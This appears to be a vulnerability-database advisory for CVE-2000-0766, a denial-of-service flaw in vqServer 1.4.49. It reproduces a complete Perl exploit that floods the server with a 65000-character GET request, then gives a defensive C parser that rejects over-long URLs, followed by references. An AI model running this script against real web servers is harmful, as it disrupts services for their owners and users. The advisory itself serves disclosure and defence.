vqSoft vqServer 1.4.49 Remote Long URL Denial-of-Service Vulnerability


Vulnerability ID 1105967 Vulnerability type Unknown
Published 2000-08-19 Updated 2005-05-02
CVE ID CVE-2000-0766
CNNVD-ID CNNVD-200010-028
Platform Multiple CVSS score 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/20178
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200010-028
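|Vulnerability details
vqServer is a small web server program that runs on Microsoft Windows. The implementation of vqServer 1.4.49 contains a buffer overflow that a remote attacker may be able to use to cause a denial of service on the server. If a remote attacker sends the server a "GET" request 65000 bytes long, the server stops responding. It must be restarted before it can provide normal service again.
|Exploit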
source: http://www.securityfocus.com/bid/1610/info

vqServer 1.4.49 is subject to a buffer overflow. If a GET request is sent to the server containing 65 000 characters the server will stop responding. A reboot is required in order to gain normal functionality.


#!/usr/bin/perl 
# DoS exploit for vqServer 1.4.49 
# This vulnerability was discovered by nemesystm 
# ([email protected])
#
# code by: sinfony    ([email protected]) 
# [confess.sins.labs] (http://www.ro0t.nu/csl) 
# and DHC member	    
#
# kiddie quote of the year:
# <gammbitr> dude piffy stfu i bet you don't even know how to exploit it 

die "vqServer 1.4.49 DoS by sinfony ([email protected])\n
usage: $0 <host> \n" 
if $#ARGV != 0; 

use IO::Socket;

$host = $ARGV[0];
$port = 80;

print "Connecting to $host on port $port...\n"; 
$suck = IO::Socket::INET->
	new(Proto=>"tcp", 
	PeerAddr=>$host,
	PeerPort=>$port)
	|| die "$host isnt a webserver you schmuck.\n"; 

# request path: 65000 repetitions of "A", the length given in the advisory
$a = "A";
$send = $a x 65000;
	print "Connected, sending exploit.\n";
	print $suck "GET /$send\n"; 
sleep(3); 
	print "Exploit sent. vqServer should be dead.\n";
close($suck);
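
A defensive counterpart to the issue described above, added here as an example (it is not code from vqServer or from the original advisory): a request-line parser that bounds the request target and answers 414 instead of copying an over-long URL. The names `parse_request_line` and `MAX_TARGET` and the 2048-byte limit are assumptions for illustration; vqServer's own parsing code does not appear on this page.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_TARGET 2048   /* assumed policy limit on request-target length */

/* Parse "GET SP target [SP version] LF" from a received buffer.
 * Returns an HTTP status: 200 parsed, 400 malformed or unterminated,
 * 414 target too long, 501 method not handled, 500 unusable output buffer.
 * Never writes more than cap bytes into target. */
int parse_request_line(const char *buf, size_t len, char *target, size_t cap)
{
    if (target == NULL || cap == 0)
        return 500;
    target[0] = '\0';
    if (len < 4 || memcmp(buf, "GET ", 4) != 0)
        return 501;                 /* only GET is handled in this example */

    const char *p = buf + 4;
    const char *end = buf + len;
    size_t n = 0;
    /* Measure the target under an explicit bound first; copying until a
     * delimiter shows up is the pattern that overflows a fixed buffer. */
    while (p + n < end && p[n] != ' ' && p[n] != '\r' && p[n] != '\n') {
        if (n >= MAX_TARGET || n + 1 >= cap)
            return 414;             /* URI Too Long: reject, copy nothing */
        n++;
    }
    if (p + n == end)
        return 400;                 /* buffer ended before any delimiter */
    if (n == 0 || p[0] != '/')
        return 400;
    memcpy(target, p, n);           /* n < cap is guaranteed by the loop */
    target[n] = '\0';
    return 200;
}

int main(void)
{
    /* Constructed sample: a GET with a 65000-character path, as in the advisory. */
    static char req[5 + 65000 + 1];
    char target[MAX_TARGET + 1];
    memcpy(req, "GET /", 5);
    memset(req + 5, 'A', 65000);
    req[sizeof req - 1] = '\n';
    printf("%d\n", parse_request_line(req, sizeof req, target, sizeof target));
    return 0;
}
```
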
|References

Source: BID
Name: 1610
Link: http://www.securityfocus.com/bid/1610
Source: BUGTRAQ
Name: 20000819 D.o.S Vulnerability in vqServer
Link: http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
Source: XF
Name: vqserver-get-dos
Link: http://xforce.iss.net/static/5152.php
Source: NSFOCUS
Name: 790
Link: http://www.nsfocus.net/vulndb/790
